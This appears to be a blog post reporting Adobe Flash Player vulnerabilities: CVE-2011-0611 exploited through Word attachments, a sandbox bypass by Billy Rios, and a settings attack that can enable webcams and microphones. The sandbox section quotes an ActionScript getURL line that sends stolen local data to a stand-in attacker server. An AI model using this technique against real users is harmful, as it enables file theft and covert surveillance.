July 17, 2019

Adobe Reveals Details of New Active Exploit in Flash Player

Adobe has revealed details of a critical vulnerability (CVE-2011-0611) in its Flash Player that is being actively exploited. This is another security blow for Adobe considering that recently it was revealed that hackers managed to breach security at RSA using a flaw in Flash. The current exploit, which targets Windows, uses a Flash (.swf) file embedded in a Microsoft Word (.doc) file delivered as an email attachment.

According to Adobe the critical vulnerability exists in Flash Player 10.2.153.1 (10.2.154.25 for Chrome users) and earlier versions for Windows, Macintosh, Linux and Solaris. Also affected is Adobe Flash Player 10.2.156.12 and earlier versions for Android.

Adobe are working on a update to Flash Player 10.2.x and earlier versions for Windows, Macintosh, Linux, Solaris and Android.

AFFECTED SOFTWARE VERSIONS

  • Adobe Flash Player 10.2.153.1 and earlier versions for Windows, Macintosh, Linux and Solaris operating systems
  • Adobe Flash Player 10.2.154.25 and earlier for Chrome users
  • Adobe Flash Player 10.2.156.12 and earlier for Android
  • The Authplay.dll component that ships with Adobe Reader and Acrobat X (10.0.2) and earlier 10.x and 9.x versions for Windows and Macintosh operating systems

NOTE: Adobe Reader 9.x for UNIX, Adobe Reader for Android, and Adobe Reader and Acrobat 8.x are not affected by this issue.

Do you think Adobe Flash has become a liability, especially for corporations? Leave a comment below.

Bypass Flash Player Sandbox

Adobe Flash applications run locally can access to the local files and transfer them to the attacker server.

Adobe has implemented a number of sandboxes to enhance the user’s security. However, the imposed restrictions by sandboxes are depending to the origin and access rights of the SWF file. Hence, the local SWF files run within the local-with-file-system sandbox and are permitted to access to the local files without an access to the network.

However, the security researcher, Billy Rios has discovered that Adobe controls access to the network using a blacklist of protocols such as HTTP and HTTPS. Therefore, it is possible to send files to a server using the file: protocol handler. Nevertheless, this is only possible within the local area network.

Billy Rios has identified other protocol handler which can be used to send data to remote servers by mhtml and using the ActionScript command: getURL(‘mhtml:http://attacker-server.com/stolen-data-here‘, ”); from the victim PC.

Flash Player as a spy system

If a forged certificate is accepted when accessing the Flash Player’s Settings Manager, which is available exclusively online, attackers can potentially manipulate the player’s website privacy settings. This allows a web page to access a computer’s web cams and microphones and remotely turn the computer into a covert listening device or surveillance camera.

Read the full article here.

Source:[TheHSecurity]